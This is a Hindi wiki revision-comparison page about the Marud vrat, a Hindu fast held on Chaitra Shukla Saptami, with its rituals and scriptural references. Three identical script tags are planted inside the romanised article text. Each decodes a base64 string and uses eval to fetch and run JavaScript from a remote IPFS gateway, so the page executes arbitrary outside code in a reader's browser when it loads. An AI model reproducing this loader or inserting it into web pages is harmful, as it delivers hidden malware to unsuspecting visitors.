Difference between revisions of "मरुद व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*मरुद व्रत चैत्र शुक्ल सप्तमी को होता है।
+
*मरुद व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[सप्तमी]] को होता है।
*मरुद व्रत में षष्ठी पर उपवास रखा जाता है।  
+
*मरुद व्रत में [[षष्ठी]] पर उपवास रखा जाता है।  
 
*सप्तमी पर ऋतुओं की पूजा की जाती है।
 
*सप्तमी पर ऋतुओं की पूजा की जाती है।
 
*कर्ता को सात पंक्तियाँ बनानी होती हैं और प्रत्येक पंक्ति में सात मण्डल होते हैं, जो कि चन्दन लेप से बनाये जाते हैं।  
 
*कर्ता को सात पंक्तियाँ बनानी होती हैं और प्रत्येक पंक्ति में सात मण्डल होते हैं, जो कि चन्दन लेप से बनाये जाते हैं।  
 
*प्रत्येक पंक्ति में 'एक ज्योतिः' से 'सप्तज्योतिः' तक सात नाम लिखे जाते हैं।
 
*प्रत्येक पंक्ति में 'एक ज्योतिः' से 'सप्तज्योतिः' तक सात नाम लिखे जाते हैं।
*प्रत्येक पंक्ति में विभिन्न नाम भी होते है।
+
*प्रत्येक पंक्ति में विभिन्न नाम भी होते हैं।
 
*49 दीप जलाये जाते हैं।
 
*49 दीप जलाये जाते हैं।
*घी का होम एवं वर्ष भर ब्रह्म भोज कराया जाता है।  
+
*[[घी]] का [[होम]] एवं वर्ष भर ब्रह्म भोज कराया जाता है।  
*अन्त में नवीन वस्त्र एवं गाय का दान दिया जाता है।  
+
*अन्त में नवीन वस्त्र एवं [[गाय]] का दान दिया जाता है।  
*इस व्रत से स्वास्थ्य, धन, पुत्रों, विद्या एवं स्वर्ग की प्राप्ति होती है।<ref>हेमाद्रि व्रत॰ 1, 1|775-777, विष्णुधर्मोत्तपुराण 3|166|1-22</ref>  
+
*इस व्रत से स्वास्थ्य, धन, पुत्रों, विद्या एवं स्वर्ग की प्राप्ति होती है।<ref>हेमाद्रि व्रतखण्ड 1, 1|775-777, विष्णुधर्मोत्तपुराण 3|166|1-22</ref>  
*मरुत 7 या 7 के सात गुने हैं।<ref>देखिए ऋ0 (5, 52|17, सप्त में सप्त शाकिन), तैत्तरीय संहिता (2|2|11|1, सप्तगणा वै मरुत)</ref>
+
*मरुत 7 या 7 के सात गुने हैं।<ref>देखिए ऋ0 (5, 52|17, सप्त में सप्त शाकिन), तैत्तरीय संहिता (2|2|11|1, सप्तगणा वै मरुत</ref>
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • marud vrat chaitr shukl paksh ki saptami ko hota hai.
  • marud vrat mean shashthi par upavas rakha jata hai.
  • saptami par rrituoan ki pooja ki jati hai.
  • karta ko sat panktiyaan banani hoti haian aur pratyek pankti mean sat mandal hote haian, jo ki chandan lep se banaye jate haian.
  • pratyek pankti mean 'ek jyotiah' se 'saptajyotiah' tak sat nam likhe jate haian.
  • pratyek pankti mean vibhinn nam bhi hote haian.
  • 49 dip jalaye jate haian.
  • ghi ka hom evan varsh bhar brahm bhoj karaya jata hai.
  • ant mean navin vastr evan gay ka dan diya jata hai.
  • is vrat se svasthy, dhan, putroan, vidya evan svarg ki prapti hoti hai.[1]
  • marut 7 ya 7 ke sat gune haian.[2]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri vratakhand 1, 1|775-777, vishnudharmottapuran 3|166|1-22
  2. dekhie rri0 (5, 52|17, sapt mean sapt shakin), taittariy sanhita (2|2|11|1, saptagana vai marut

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>